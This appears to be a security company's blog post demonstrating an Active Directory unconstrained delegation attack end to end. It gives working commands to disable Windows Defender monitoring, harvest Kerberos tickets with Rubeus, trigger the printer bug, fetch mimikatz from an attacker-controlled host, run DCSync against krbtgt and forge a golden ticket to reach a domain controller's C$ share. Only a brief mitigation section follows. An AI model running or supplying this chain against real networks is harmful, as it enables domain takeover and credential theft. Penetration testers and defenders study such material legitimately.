Practical Demo of the Unconstrained Delegation Attack

There has been many publications out there explaining various ways to attack an unconstrained delegation. This research/post is to practically show how such misconfiguration can be exploited easily and effectively. To further understand this kind of attack, check out the resources at the bottom below.

Let’s get started:

To perform this kind of attack,

  1. Gain access to a domain controller (DCB) in ForestB.
  2. Monitor for logon event through LSA API with Rubeus.exe: Rubeus.exe.
  3. Use a MS-RPRN.exe to trigger the “printer bug” against DCA.
  4. Trigger the MS-RPRN “printer bug” against a domain controller (e.g. DCA) in ForestA.
  5. Harvest a Ticket Granting Ticket (TGT) with Rubeus.exe.
  6. Perform DCSYNC attack to retrieve the TGT credentials.
  7. Forge a golden ticket.
  8. Domain controller(DCA) in ForestA gets compromised.

Practical Demo:

checking the hostname

we can see we are now logged in to the DB-Server.

Find a computer on the domain that has unrestricted kerberos delegation property set using the command:

Get-ADComputer -Filter {(OperatingSystem -like “*windows*server*”) -and (OperatingSystem -notlike “2016”) -and (Enabled -eq “True”)} -Properties * | select Name | ft -HideTableHeaders

Error due to GET-ADComputer not being recognised

Lets try to install the Active Directory Module for PowerShell. The AD module is already installed on domain controllers on Windows Server but on member servers, you can add the module as a feature in Server Manager or using PowerShell command below:

get-windowsfeature | where name -like RSAT-AD-PowerShell | Install-WindowsFeature

Modules installed successfully

Now retry with the previous command to find a computer on the domain that has unrestricted kerberos delegation property:

Get-ADComputer -Filter {(OperatingSystem -like “*windows*server*”) -and (OperatingSystem -notlike “2016”) -and (Enabled -eq “True”)} -Properties * | select Name | ft -HideTableHeaders

2 servers found

We check if our server DB-SERVER has a TrustedForDelegation set to TRUE. If yes, we can start our attack

Get-ADComputer -Filter {TrustedForDelegation -eq $true -and primarygroupid -eq 515} -Properties trustedfordelegation,serviceprincipalname,description

TrustedForDelegation set to TRUE

Attack time:

Have 2 shells (lets call that shell 1 and shell 2)opened so that you can run Rubeus.exe and MS-RPRN.exe simultaneously.

2 shells spawned

Disable real time AV monitoring from the shell with command:

Set-MpPreference -DisableRealtimeMonitoring $true

Upload MS-RPRN.exe and Rubeus.exe

uploading MS-RPRN AND Rubeus.exe

In shell on the left (port 2222) use Rubeus to harvest for TGTs every 3 seconds with the command:

Rubeus.exe harvest /interval:3

TGT Harvested

and in shell on the right (port 3333) use MS-RPRN to request the TGTs

c:\Users\Public\MS-RPRN.exe \\ \\

\\ = is the domain controller we want to compromise

\\ = is the machine with delegation enabled that we control.

Trigger the MS-RPRN

remove spaces from captured hash ticket and save it into a file

hash file

pass the ticket with Rubeus.exe

Rubeus.exe ptt /ticket:hash

Let’s purge user kerberos ticket without Logoff with command:


Purge User Kerberos Ticket without Logoff

To perform a DCSync attack, we must have compromised a user with the Replicating Directory Changes All and Replicating Directory Changes privileges. Members of the Administrators, Domain Admins, Enterprise Admins, and Domain Controllers groups have these privileges by default.

Upload mimikatz to target. Remember we already disabled real-time monitoring from the start of our attack

powershell.exe Invoke-WebRequest -Uri ‘http://my-ip-here/mimikatz.exe' -Outfile mimikatz.exe

mimikatz.exe “privilege::debug” “lsadump::dcsync /user:OPERATIONS\krbtgt” exit

Krbtgt NTLM Hash and SID Extracted

let’s forge a golden ticket
kerberos::golden /User:administrator / /sid:S-1–5–21–3757735274–1965336150–1982876978 /krbtgt:8e2b8effbf6735b8fb5be206cb3dfead /startoffset:0 /endin:600 /renewmax:10080 /ptt

Forging a golden ticket

we can now view shared directories on our target domain controller

dir \\\C$

share directory(\C$)

Mitigations from Unconstrained Delegation:

You should be able to turn on constraints to limit the SPNs delegation can work for.

Placing privileged users in the Protected Users group will prevent them from being used in delegation and keep their TGTs off these computers after they authenticate. The same goes for the Account, which is sensitive and cannot be a delegate option.

Resources: :

You can also check out our services on::

Ghana’s #1 practical cyber security company

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store